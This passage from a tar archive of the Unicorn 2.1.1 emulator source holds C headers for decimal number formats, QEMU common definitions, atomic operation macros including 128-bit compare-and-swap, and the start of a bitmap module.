(Elimit-1) */ #define DECIMAL32_Ehigh (DECIMAL32_Emax+DECIMAL32_Bias-DECIMAL32_Pmax+1) /* check enough digits, if pre-defined */ #if defined(DECNUMDIGITS) #if (DECNUMDIGITS<DECIMAL32_Pmax) #error decimal32.h needs pre-defined DECNUMDIGITS>=7 for safe use #endif #endif #ifndef DECNUMDIGITS #define DECNUMDIGITS DECIMAL32_Pmax /* size if not already defined*/ #endif #include "libdecnumber/decNumber.h" /* Decimal 32-bit type, accessible by bytes */ typedef struct { uint8_t bytes[DECIMAL32_Bytes]; /* decimal32: 1, 5, 6, 20 bits*/ } decimal32; /* special values [top byte excluding sign bit; last two bits are */ /* don't-care for Infinity on input, last bit don't-care for NaN] */ #if !defined(DECIMAL_NaN) #define DECIMAL_NaN 0x7c /* 0 11111 00 NaN */ #define DECIMAL_sNaN 0x7e /* 0 11111 10 sNaN */ #define DECIMAL_Inf 0x78 /* 0 11110 00 Infinity */ #endif /* ---------------------------------------------------------------- */ /* Routines */ /* ---------------------------------------------------------------- */ /* String conversions */ decimal32 * decimal32FromString(decimal32 *, const char *, decContext *); char * decimal32ToString(const decimal32 *, char *); char * decimal32ToEngString(const decimal32 *, char *); /* decNumber conversions */ decimal32 * decimal32FromNumber(decimal32 *, const decNumber *, decContext *); decNumber * decimal32ToNumber(const decimal32 *, decNumber *); /* Format-dependent utilities */ uint32_t decimal32IsCanonical(const decimal32 *); decimal32 * decimal32Canonical(decimal32 *, const decimal32 *); #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/libdecnumber/dpd/decimal64.h���������������������������������������������0000664�0000000�0000000�00000010041�14675241067�0022715�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Decimal 64-bit format module header for the decNumber C Library. Copyright (C) 2005, 2007 Free Software Foundation, Inc. Contributed by IBM Corporation. Author Mike Cowlishaw. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal 64-bit format module header */ /* ------------------------------------------------------------------ */ #ifndef DECIMAL64_H #define DECIMAL64_H #define DEC64NAME "decimal64" /* Short name */ #define DEC64FULLNAME "Decimal 64-bit Number" /* Verbose name */ #define DEC64AUTHOR "Mike Cowlishaw" /* Who to blame */ /* parameters for decimal64s */ #define DECIMAL64_Bytes 8 /* length */ #define DECIMAL64_Pmax 16 /* maximum precision (digits) */ #define DECIMAL64_Emax 384 /* maximum adjusted exponent */ #define DECIMAL64_Emin -383 /* minimum adjusted exponent */ #define DECIMAL64_Bias 398 /* bias for the exponent */ #define DECIMAL64_String 24 /* maximum string length, +1 */ #define DECIMAL64_EconL 8 /* exp. continuation length */ /* highest biased exponent (Elimit-1) */ #define DECIMAL64_Ehigh (DECIMAL64_Emax+DECIMAL64_Bias-DECIMAL64_Pmax+1) /* check enough digits, if pre-defined */ #if defined(DECNUMDIGITS) #if (DECNUMDIGITS<DECIMAL64_Pmax) #error decimal64.h needs pre-defined DECNUMDIGITS>=16 for safe use #endif #endif #ifndef DECNUMDIGITS #define DECNUMDIGITS DECIMAL64_Pmax /* size if not already defined*/ #endif #include "libdecnumber/decNumber.h" /* Decimal 64-bit type, accessible by bytes */ typedef struct { uint8_t bytes[DECIMAL64_Bytes]; /* decimal64: 1, 5, 8, 50 bits*/ } decimal64; /* special values [top byte excluding sign bit; last two bits are */ /* don't-care for Infinity on input, last bit don't-care for NaN] */ #if !defined(DECIMAL_NaN) #define DECIMAL_NaN 0x7c /* 0 11111 00 NaN */ #define DECIMAL_sNaN 0x7e /* 0 11111 10 sNaN */ #define DECIMAL_Inf 0x78 /* 0 11110 00 Infinity */ #endif /* ---------------------------------------------------------------- */ /* Routines */ /* ---------------------------------------------------------------- */ /* String conversions */ decimal64 * decimal64FromString(decimal64 *, const char *, decContext *); char * decimal64ToString(const decimal64 *, char *); char * decimal64ToEngString(const decimal64 *, char *); /* decNumber conversions */ decimal64 * decimal64FromNumber(decimal64 *, const decNumber *, decContext *); decNumber * decimal64ToNumber(const decimal64 *, decNumber *); /* Format-dependent utilities */ uint32_t decimal64IsCanonical(const decimal64 *); decimal64 * decimal64Canonical(decimal64 *, const decimal64 *); #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu-common.h������������������������������������������������������������0000664�0000000�0000000�00000006060�14675241067�0020206�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * This file is supposed to be included only by .c files. No header file should * depend on qemu-common.h, as this would easily lead to circular header * dependencies. * * If a header file uses a definition from qemu-common.h, that definition * must be moved to a separate header file, and the header that uses it * must include that header. */ #ifndef QEMU_COMMON_H #define QEMU_COMMON_H #include <unicorn/platform.h> #include <qemu/typedefs.h> #define TFR(expr) do { if ((expr) != -1) break; } while (errno == EINTR) /* Copyright string for -version arguments, About dialogs, etc */ #define QEMU_COPYRIGHT "Copyright (c) 2003-2020 " \ "Fabrice Bellard and the QEMU Project developers" /* Bug reporting information for --help arguments, About dialogs, etc */ #define QEMU_HELP_BOTTOM \ "See <https://qemu.org/contribute/report-a-bug> for how to report bugs.\n" \ "More information on the QEMU project at <https://qemu.org>." /* main function, renamed */ #if defined(CONFIG_COCOA) int qemu_main(int argc, char **argv, char **envp); #endif void qemu_get_timedate(struct tm *tm, int offset); int qemu_timedate_diff(struct tm *tm); void *qemu_oom_check(void *ptr); #ifdef _WIN32 /* MinGW needs type casts for the 'buf' and 'optval' arguments. */ #define qemu_getsockopt(sockfd, level, optname, optval, optlen) \ getsockopt(sockfd, level, optname, (void *)optval, optlen) #define qemu_setsockopt(sockfd, level, optname, optval, optlen) \ setsockopt(sockfd, level, optname, (const void *)optval, optlen) #define qemu_recv(sockfd, buf, len, flags) recv(sockfd, (void *)buf, len, flags) #define qemu_sendto(sockfd, buf, len, flags, destaddr, addrlen) \ sendto(sockfd, (const void *)buf, len, flags, destaddr, addrlen) #else #define qemu_getsockopt(sockfd, level, optname, optval, optlen) \ getsockopt(sockfd, level, optname, optval, optlen) #define qemu_setsockopt(sockfd, level, optname, optval, optlen) \ setsockopt(sockfd, level, optname, optval, optlen) #define qemu_recv(sockfd, buf, len, flags) recv(sockfd, buf, len, flags) #define qemu_sendto(sockfd, buf, len, flags, destaddr, addrlen) \ sendto(sockfd, buf, len, flags, destaddr, addrlen) #endif struct uc_struct; void cpu_exec_init_all(struct uc_struct *uc); /** * set_preferred_target_page_bits: * @bits: number of bits needed to represent an address within the page * * Set the preferred target page size (the actual target page * size may be smaller than any given CPU's preference). * Returns true on success, false on failure (which can only happen * if this is called after the system has already finalized its * choice of page size and the requested page size is smaller than that). */ bool set_preferred_target_page_bits(struct uc_struct *uc, int bits); /** * finalize_target_page_bits: * Commit the final value set by set_preferred_target_page_bits. */ void finalize_target_page_bits(struct uc_struct *uc); /* OS specific functions */ void os_setup_early_signal_handling(void); void page_size_init(struct uc_struct *uc); CPUState *qemu_get_cpu(struct uc_struct *uc, int index); #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/��������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016545�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/atomic.h������������������������������������������������������������0000664�0000000�0000000�00000035016�14675241067�0020177�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Simple interface for atomic operations. * * Copyright (C) 2013 Red Hat, Inc. * * Author: Paolo Bonzini <pbonzini@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. * * See docs/atomics.txt for discussion about the guarantees each * atomic primitive is meant to provide. */ #ifndef QEMU_ATOMIC_H #define QEMU_ATOMIC_H #include "qemu/compiler.h" // we do not really support multiple CPUs, so we dont care #define smp_mb() #define smp_wmb() #define smp_rmb() #define barrier() /* The variable that receives the old value of an atomically-accessed * variable must be non-qualified, because atomic builtins return values * through a pointer-type argument as in __atomic_load(&var, &old, MODEL). * * This macro has to handle types smaller than int manually, because of * implicit promotion. int and larger types, as well as pointers, can be * converted to a non-qualified type just by applying a binary operator. */ #define typeof_strip_qual(expr) \ __typeof__( \ __builtin_choose_expr( \ __builtin_types_compatible_p(__typeof__(expr), bool) || \ __builtin_types_compatible_p(__typeof__(expr), const bool) || \ __builtin_types_compatible_p(__typeof__(expr), volatile bool) || \ __builtin_types_compatible_p(__typeof__(expr), const volatile bool), \ (bool)1, \ __builtin_choose_expr( \ __builtin_types_compatible_p(__typeof__(expr), signed char) || \ __builtin_types_compatible_p(__typeof__(expr), const signed char) || \ __builtin_types_compatible_p(__typeof__(expr), volatile signed char) || \ __builtin_types_compatible_p(__typeof__(expr), const volatile signed char), \ (signed char)1, \ __builtin_choose_expr( \ __builtin_types_compatible_p(__typeof__(expr), unsigned char) || \ __builtin_types_compatible_p(__typeof__(expr), const unsigned char) || \ __builtin_types_compatible_p(__typeof__(expr), volatile unsigned char) || \ __builtin_types_compatible_p(__typeof__(expr), const volatile unsigned char), \ (unsigned char)1, \ __builtin_choose_expr( \ __builtin_types_compatible_p(__typeof__(expr), signed short) || \ __builtin_types_compatible_p(__typeof__(expr), const signed short) || \ __builtin_types_compatible_p(__typeof__(expr), volatile signed short) || \ __builtin_types_compatible_p(__typeof__(expr), const volatile signed short), \ (signed short)1, \ __builtin_choose_expr( \ __builtin_types_compatible_p(__typeof__(expr), unsigned short) || \ __builtin_types_compatible_p(__typeof__(expr), const unsigned short) || \ __builtin_types_compatible_p(__typeof__(expr), volatile unsigned short) || \ __builtin_types_compatible_p(__typeof__(expr), const volatile unsigned short), \ (unsigned short)1, \ (expr)+0)))))) #if defined(__ATOMIC_RELAXED) && !(defined(_MSC_VER) && defined(__clang__)) /* For C11 atomic ops */ /* Sanity check that the size of an atomic operation isn't "overly large". * Despite the fact that e.g. i686 has 64-bit atomic operations, we do not * want to use them because we ought not need them, and this lets us do a * bit of sanity checking that other 32-bit hosts might build. * * That said, we have a problem on 64-bit ILP32 hosts in that in order to * sync with TCG_OVERSIZED_GUEST, this must match TCG_TARGET_REG_BITS. * We'd prefer not want to pull in everything else TCG related, so handle * those few cases by hand. * * Note that x32 is fully detected with __x86_64__ + _ILP32, and that for * Sparc we always force the use of sparcv9 in configure. MIPS n32 (ILP32) & * n64 (LP64) ABIs are both detected using __mips64. */ #if defined(__x86_64__) || defined(__sparc__) || defined(__mips64) # define ATOMIC_REG_SIZE 8 #else # define ATOMIC_REG_SIZE sizeof(void *) #endif /* Weak atomic operations prevent the compiler moving other * loads/stores past the atomic operation load/store. However there is * no explicit memory barrier for the processor. * * The C11 memory model says that variables that are accessed from * different threads should at least be done with __ATOMIC_RELAXED * primitives or the result is undefined. Generally this has little to * no effect on the generated code but not using the atomic primitives * will get flagged by sanitizers as a violation. */ #define atomic_read__nocheck(ptr) \ __atomic_load_n(ptr, __ATOMIC_RELAXED) #define atomic_read(ptr) \ ({ \ QEMU_BUILD_BUG_ON(sizeof(*ptr) > ATOMIC_REG_SIZE); \ atomic_read__nocheck(ptr); \ }) #define atomic_set__nocheck(ptr, i) \ __atomic_store_n(ptr, i, __ATOMIC_RELAXED) #define atomic_set(ptr, i) do { \ QEMU_BUILD_BUG_ON(sizeof(*ptr) > ATOMIC_REG_SIZE); \ atomic_set__nocheck(ptr, i); \ } while(0) #define atomic_rcu_read(ptr) \ ({ \ QEMU_BUILD_BUG_ON(sizeof(*ptr) > ATOMIC_REG_SIZE); \ typeof_strip_qual(*ptr) _val; \ atomic_rcu_read__nocheck(ptr, &_val); \ _val; \ }) #define atomic_rcu_set(ptr, i) do { \ QEMU_BUILD_BUG_ON(sizeof(*ptr) > ATOMIC_REG_SIZE); \ __atomic_store_n(ptr, i, __ATOMIC_RELEASE); \ } while(0) /* All the remaining operations are fully sequentially consistent */ #define atomic_xchg__nocheck(ptr, i) ({ \ __atomic_exchange_n(ptr, (i), __ATOMIC_SEQ_CST); \ }) #define atomic_xchg(ptr, i) ({ \ QEMU_BUILD_BUG_ON(sizeof(*ptr) > ATOMIC_REG_SIZE); \ atomic_xchg__nocheck(ptr, i); \ }) /* Returns the eventual value, failed or not */ #define atomic_cmpxchg__nocheck(ptr, old, new) ({ \ typeof_strip_qual(*ptr) _old = (old); \ (void)__atomic_compare_exchange_n(ptr, &_old, new, false, \ __ATOMIC_SEQ_CST, __ATOMIC_SEQ_CST); \ _old; \ }) #define atomic_cmpxchg(ptr, old, new) ({ \ QEMU_BUILD_BUG_ON(sizeof(*ptr) > ATOMIC_REG_SIZE); \ atomic_cmpxchg__nocheck(ptr, old, new); \ }) /* Provide shorter names for GCC atomic builtins, return old value */ #define atomic_fetch_inc(ptr) __atomic_fetch_add(ptr, 1, __ATOMIC_SEQ_CST) #define atomic_fetch_dec(ptr) __atomic_fetch_sub(ptr, 1, __ATOMIC_SEQ_CST) #define atomic_fetch_add(ptr, n) __atomic_fetch_add(ptr, n, __ATOMIC_SEQ_CST) #define atomic_fetch_sub(ptr, n) __atomic_fetch_sub(ptr, n, __ATOMIC_SEQ_CST) #define atomic_fetch_and(ptr, n) __atomic_fetch_and(ptr, n, __ATOMIC_SEQ_CST) #define atomic_fetch_or(ptr, n) __atomic_fetch_or(ptr, n, __ATOMIC_SEQ_CST) #define atomic_fetch_xor(ptr, n) __atomic_fetch_xor(ptr, n, __ATOMIC_SEQ_CST) #define atomic_inc_fetch(ptr) __atomic_add_fetch(ptr, 1, __ATOMIC_SEQ_CST) #define atomic_dec_fetch(ptr) __atomic_sub_fetch(ptr, 1, __ATOMIC_SEQ_CST) #define atomic_add_fetch(ptr, n) __atomic_add_fetch(ptr, n, __ATOMIC_SEQ_CST) #define atomic_sub_fetch(ptr, n) __atomic_sub_fetch(ptr, n, __ATOMIC_SEQ_CST) #define atomic_and_fetch(ptr, n) __atomic_and_fetch(ptr, n, __ATOMIC_SEQ_CST) #define atomic_or_fetch(ptr, n) __atomic_or_fetch(ptr, n, __ATOMIC_SEQ_CST) #define atomic_xor_fetch(ptr, n) __atomic_xor_fetch(ptr, n, __ATOMIC_SEQ_CST) /* And even shorter names that return void. */ #define atomic_inc(ptr) ((void) __atomic_fetch_add(ptr, 1, __ATOMIC_SEQ_CST)) #define atomic_dec(ptr) ((void) __atomic_fetch_sub(ptr, 1, __ATOMIC_SEQ_CST)) #define atomic_add(ptr, n) ((void) __atomic_fetch_add(ptr, n, __ATOMIC_SEQ_CST)) #define atomic_sub(ptr, n) ((void) __atomic_fetch_sub(ptr, n, __ATOMIC_SEQ_CST)) #define atomic_and(ptr, n) ((void) __atomic_fetch_and(ptr, n, __ATOMIC_SEQ_CST)) #define atomic_or(ptr, n) ((void) __atomic_fetch_or(ptr, n, __ATOMIC_SEQ_CST)) #define atomic_xor(ptr, n) ((void) __atomic_fetch_xor(ptr, n, __ATOMIC_SEQ_CST)) #else /* __ATOMIC_RELAXED */ #if defined(__i386__) || defined(__x86_64__) || defined(__s390x__) /* * __sync_lock_test_and_set() is documented to be an acquire barrier only, * but it is a full barrier at the hardware level. Add a compiler barrier * to make it a full barrier also at the compiler level. */ #ifndef _MSC_VER #if defined(__clang__) #define atomic_xchg(ptr, i) __sync_swap(ptr, i) #else #define atomic_xchg(ptr, i) (__sync_lock_test_and_set(ptr, i)) #endif #endif #endif /* These will only be atomic if the processor does the fetch or store * in a single issue memory operation */ #define atomic_read(ptr) *(ptr) #define atomic_set(ptr, i) *(ptr) = (i) /** * * atomic_rcu_read - reads a RCU-protected pointer to a local variable * into a RCU read-side critical section. The pointer can later be safely * dereferenced within the critical section. * * This ensures that the pointer copy is invariant thorough the whole critical * section. * * Inserts memory barriers on architectures that require them (currently only * Alpha) and documents which pointers are protected by RCU. * * atomic_rcu_read also includes a compiler barrier to ensure that * value-speculative optimizations (e.g. VSS: Value Speculation * Scheduling) does not perform the data read before the pointer read * by speculating the value of the pointer. * * Should match atomic_rcu_set(), atomic_xchg(), atomic_cmpxchg(). */ #define atomic_rcu_read(ptr) ({ \ atomic_read(ptr); \ }) /** * atomic_rcu_set - assigns (publicizes) a pointer to a new data structure * meant to be read by RCU read-side critical sections. * * Documents which pointers will be dereferenced by RCU read-side critical * sections and adds the required memory barriers on architectures requiring * them. It also makes sure the compiler does not reorder code initializing the * data structure before its publication. * * Should match atomic_rcu_read(). */ #define atomic_rcu_set(ptr, i) do { \ atomic_set(ptr, i); \ } while (0) #define atomic_xchg__nocheck atomic_xchg /* Provide shorter names for GCC atomic builtins. */ #ifdef _MSC_VER // these return the new value (so we make it return the previous value) #define atomic_fetch_inc(ptr) ((InterlockedIncrement(ptr))-1) #define atomic_fetch_dec(ptr) ((InterlockedDecrement(ptr))+1) #define atomic_fetch_add(ptr, n) ((InterlockedAdd(ptr, n))-n) #define atomic_fetch_sub(ptr, n) ((InterlockedAdd(ptr, -n))+n) #define atomic_fetch_and(ptr, n) ((InterlockedAnd(ptr, n))) #define atomic_fetch_or(ptr, n) ((InterlockedOr(ptr, n))) #define atomic_fetch_xor(ptr, n) ((InterlockedXor(ptr, n))) #define atomic_inc_fetch(ptr) (InterlockedIncrement((long*)(ptr))) #define atomic_dec_fetch(ptr) (InterlockedDecrement((long*)(ptr))) #define atomic_add_fetch(ptr, n) (InterlockedExchangeAdd((long*)ptr, n) + n) #define atomic_sub_fetch(ptr, n) (InterlockedExchangeAdd((long*)ptr, n) - n) #define atomic_and_fetch(ptr, n) (InterlockedAnd((long*)ptr, n) & n) #define atomic_or_fetch(ptr, n) (InterlockedOr((long*)ptr, n) | n) #define atomic_xor_fetch(ptr, n) (InterlockedXor((long*)ptr, n) ^ n) #define atomic_cmpxchg(ptr, old, new) ((InterlockedCompareExchange(ptr, old, new))) #define atomic_cmpxchg__nocheck(ptr, old, new) atomic_cmpxchg(ptr, old, new) #define atomic_inc(ptr) ((void) InterlockedIncrement(ptr)) #define atomic_dec(ptr) ((void) InterlockedDecrement(ptr)) #define atomic_add(ptr, n) ((void) InterlockedAdd(ptr, n)) #define atomic_sub(ptr, n) ((void) InterlockedAdd(ptr, -n)) #define atomic_and(ptr, n) ((void) InterlockedAnd(ptr, n)) #define atomic_or(ptr, n) ((void) InterlockedOr(ptr, n)) #define atomic_xor(ptr, n) ((void) InterlockedXor(ptr, n)) #else // GCC/clang // these return the previous value #define atomic_fetch_inc(ptr) __sync_fetch_and_add(ptr, 1) #define atomic_fetch_dec(ptr) __sync_fetch_and_add(ptr, -1) #define atomic_fetch_add(ptr, n) __sync_fetch_and_add(ptr, n) #define atomic_fetch_sub(ptr, n) __sync_fetch_and_sub(ptr, n) #define atomic_fetch_and(ptr, n) __sync_fetch_and_and(ptr, n) #define atomic_fetch_or(ptr, n) __sync_fetch_and_or(ptr, n) #define atomic_fetch_xor(ptr, n) __sync_fetch_and_xor(ptr, n) #define atomic_inc_fetch(ptr) __sync_add_and_fetch(ptr, 1) #define atomic_dec_fetch(ptr) __sync_add_and_fetch(ptr, -1) #define atomic_add_fetch(ptr, n) __sync_add_and_fetch(ptr, n) #define atomic_sub_fetch(ptr, n) __sync_sub_and_fetch(ptr, n) #define atomic_and_fetch(ptr, n) __sync_and_and_fetch(ptr, n) #define atomic_or_fetch(ptr, n) __sync_or_and_fetch(ptr, n) #define atomic_xor_fetch(ptr, n) __sync_xor_and_fetch(ptr, n) #define atomic_cmpxchg(ptr, old, new) __sync_val_compare_and_swap(ptr, old, new) #define atomic_cmpxchg__nocheck(ptr, old, new) atomic_cmpxchg(ptr, old, new) #define atomic_inc(ptr) ((void) __sync_fetch_and_add(ptr, 1)) #define atomic_dec(ptr) ((void) __sync_fetch_and_add(ptr, -1)) #define atomic_add(ptr, n) ((void) __sync_fetch_and_add(ptr, n)) #define atomic_sub(ptr, n) ((void) __sync_fetch_and_sub(ptr, n)) #define atomic_and(ptr, n) ((void) __sync_fetch_and_and(ptr, n)) #define atomic_or(ptr, n) ((void) __sync_fetch_and_or(ptr, n)) #define atomic_xor(ptr, n) ((void) __sync_fetch_and_xor(ptr, n)) #endif #endif /* __ATOMIC_RELAXED */ #endif /* QEMU_ATOMIC_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/atomic128.h���������������������������������������������������������0000664�0000000�0000000�00000012506�14675241067�0020431�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Simple interface for 128-bit atomic operations. * * Copyright (C) 2018 Linaro, Ltd. * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. * * See docs/devel/atomics.txt for discussion about the guarantees each * atomic primitive is meant to provide. */ #ifndef QEMU_ATOMIC128_H #define QEMU_ATOMIC128_H #include "int128.h" /* * GCC is a house divided about supporting large atomic operations. * * For hosts that only have large compare-and-swap, a legalistic reading * of the C++ standard means that one cannot implement __atomic_read on * read-only memory, and thus all atomic operations must synchronize * through libatomic. * * See https://gcc.gnu.org/bugzilla/show_bug.cgi?id=80878 * * This interpretation is not especially helpful for QEMU. * For softmmu, all RAM is always read/write from the hypervisor. * For user-only, if the guest doesn't implement such an __atomic_read * then the host need not worry about it either. * * Moreover, using libatomic is not an option, because its interface is * built for std::atomic<T>, and requires that *all* accesses to such an * object go through the library. In our case we do not have an object * in the C/C++ sense, but a view of memory as seen by the guest. * The guest may issue a large atomic operation and then access those * pieces using word-sized accesses. From the hypervisor, we have no * way to connect those two actions. * * Therefore, special case each platform. */ #if defined(CONFIG_ATOMIC128) static inline Int128 atomic16_cmpxchg(Int128 *ptr, Int128 cmp, Int128 new) { return atomic_cmpxchg__nocheck(ptr, cmp, new); } # define HAVE_CMPXCHG128 1 #elif defined(CONFIG_CMPXCHG128) static inline Int128 atomic16_cmpxchg(Int128 *ptr, Int128 cmp, Int128 new) { #ifdef _MSC_VER /* compare and swap. the same as __sync_val_compare_and_swap(). if the current value of *ptr is cmp, then write new into *ptr, return *ptr old value. */ Int128 save = *ptr; if (!memcmp(ptr, &cmp, sizeof(cmp))) { *ptr = new; } return save; #else return __sync_val_compare_and_swap_16(ptr, cmp, new); #endif } # define HAVE_CMPXCHG128 1 #elif defined(__aarch64__) /* Through gcc 8, aarch64 has no support for 128-bit at all. */ static inline Int128 atomic16_cmpxchg(Int128 *ptr, Int128 cmp, Int128 new) { uint64_t cmpl = int128_getlo(cmp), cmph = int128_gethi(cmp); uint64_t newl = int128_getlo(new), newh = int128_gethi(new); uint64_t oldl, oldh; uint32_t tmp; asm("0: ldaxp %[oldl], %[oldh], %[mem]\n\t" "cmp %[oldl], %[cmpl]\n\t" "ccmp %[oldh], %[cmph], #0, eq\n\t" "b.ne 1f\n\t" "stlxp %w[tmp], %[newl], %[newh], %[mem]\n\t" "cbnz %w[tmp], 0b\n" "1:" : [mem] "+m"(*ptr), [tmp] "=&r"(tmp), [oldl] "=&r"(oldl), [oldh] "=&r"(oldh) : [cmpl] "r"(cmpl), [cmph] "r"(cmph), [newl] "r"(newl), [newh] "r"(newh) : "memory", "cc"); return int128_make128(oldl, oldh); } # define HAVE_CMPXCHG128 1 #else /* Fallback definition that must be optimized away, or error. */ Int128 QEMU_ERROR("unsupported atomic") atomic16_cmpxchg(Int128 *ptr, Int128 cmp, Int128 new); # define HAVE_CMPXCHG128 0 #endif /* Some definition for HAVE_CMPXCHG128 */ #if defined(CONFIG_ATOMIC128) static inline Int128 atomic16_read(Int128 *ptr) { return atomic_read__nocheck(ptr); } static inline void atomic16_set(Int128 *ptr, Int128 val) { atomic_set__nocheck(ptr, val); } # define HAVE_ATOMIC128 1 #elif defined(__aarch64__) /* We can do better than cmpxchg for AArch64. */ static inline Int128 atomic16_read(Int128 *ptr) { uint64_t l, h; uint32_t tmp; /* The load must be paired with the store to guarantee not tearing. */ asm("0: ldxp %[l], %[h], %[mem]\n\t" "stxp %w[tmp], %[l], %[h], %[mem]\n\t" "cbnz %w[tmp], 0b" : [mem] "+m"(*ptr), [tmp] "=r"(tmp), [l] "=r"(l), [h] "=r"(h)); return int128_make128(l, h); } static inline void atomic16_set(Int128 *ptr, Int128 val) { uint64_t l = int128_getlo(val), h = int128_gethi(val); uint64_t t1, t2; /* Load into temporaries to acquire the exclusive access lock. */ asm("0: ldxp %[t1], %[t2], %[mem]\n\t" "stxp %w[t1], %[l], %[h], %[mem]\n\t" "cbnz %w[t1], 0b" : [mem] "+m"(*ptr), [t1] "=&r"(t1), [t2] "=&r"(t2) : [l] "r"(l), [h] "r"(h)); } # define HAVE_ATOMIC128 1 #elif HAVE_CMPXCHG128 static inline Int128 atomic16_read(Int128 *ptr) { /* Maybe replace 0 with 0, returning the old value. */ #ifdef _MSC_VER Int128 x = int128_make64(0); Int128 y = int128_make64(0); return atomic16_cmpxchg(ptr, x, y); #else return atomic16_cmpxchg(ptr, 0, 0); #endif } static inline void atomic16_set(Int128 *ptr, Int128 val) { Int128 old = *ptr, cmp; do { cmp = old; old = atomic16_cmpxchg(ptr, cmp, val); #ifdef _MSC_VER } while (memcmp(&old, &cmp, sizeof(old))); #else } while (old != cmp); #endif } # define HAVE_ATOMIC128 1 #else /* Fallback definitions that must be optimized away, or error. */ Int128 QEMU_ERROR("unsupported atomic") atomic16_read(Int128 *ptr); void QEMU_ERROR("unsupported atomic") atomic16_set(Int128 *ptr, Int128 val); # define HAVE_ATOMIC128 0 #endif /* Some definition for HAVE_ATOMIC128 */ #endif /* QEMU_ATOMIC128_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/bitmap.h������������������������������������������������������������0000664�0000000�0000000�00000024052�14675241067�0020175�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Bitmap Module * * Copyright (C) 2010 Corentin Chary <corentin.chary@gmail.com> * * Mostly inspired by (stolen from) linux/bitmap.h and linux/bitops.h * * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. * See the COPYING.LIB file in the top-level directory. */ #ifndef BITMAP_H #define BITMAP_H #include "qemu/bitops.h" /* * The available bitmap operations and their rough meaning in the * case that the bitmap is a single unsigned long are thus: * * Note that nbits should be always a compile time evaluable constant. * Otherwise many inlines will generate horrible code. * * bitmap_zero(dst, nbits) *dst = 0UL * bitmap_fill(dst, nbits) *dst = ~0UL * bitmap_copy(dst, src, nbits) *dst = *src * bitmap_and(dst, src1, src2, nbits) *dst = *src1 & *src2 * bitmap_or(dst, src1, src2, nbits) *dst = *src1 | *src2 * bitmap_xor(dst, src1, src2, nbits) *dst = *src1 ^ *src2 * bitmap_andnot(dst, src1, src2, nbits) *dst = *src1 & ~(*src2) * bitmap_complement(dst, src, nbits) *dst = ~(*src) * bitmap_equal(src1, src2, nbits) Are *src1 and *src2 equal? * bitmap_intersects(src1, src2, nbits) Do *src1 and *src2 overlap? * bitmap_empty(src, nbits) Are all bits zero in *src? * bitmap_full(src, nbits) Are all bits set in *src? * qemu_bitmap_set(dst, pos, nbits) Set specified bit area * bitmap_set_atomic(dst, pos, nbits) Set specified bit area with atomic ops * qemu_bitmap_clear(dst, pos, nbits) Clear specified bit area * bitmap_test_and_clear_atomic(dst, pos, nbits) Test and clear area * bitmap_find_next_zero_area(buf, len, pos, n, mask) Find bit free area * bitmap_to_le(dst, src, nbits) Convert bitmap to little endian * bitmap_from_le(dst, src, nbits) Convert bitmap from little endian * bitmap_copy_with_src_offset(dst, src, offset, nbits) * *dst = *src (with an offset into src) * bitmap_copy_with_dst_offset(dst, src, offset, nbits) * *dst = *src (with an offset into dst) */ /* * Also the following operations apply to bitmaps. * * set_bit(bit, addr) *addr |= bit * clear_bit(bit, addr) *addr &= ~bit * change_bit(bit, addr) *addr ^= bit * test_bit(bit, addr) Is bit set in *addr? * test_and_set_bit(bit, addr) Set bit and return old value * test_and_clear_bit(bit, addr) Clear bit and return old value * test_and_change_bit(bit, addr) Change bit and return old value * find_first_zero_bit(addr, nbits) Position first zero bit in *addr * find_first_bit(addr, nbits) Position first set bit in *addr * find_next_zero_bit(addr, nbits, bit) Position next zero bit in *addr >= bit * find_next_bit(addr, nbits, bit) Position next set bit in *addr >= bit */ #define BITMAP_FIRST_WORD_MASK(start) (~0UL << ((start) & (BITS_PER_LONG - 1))) #define 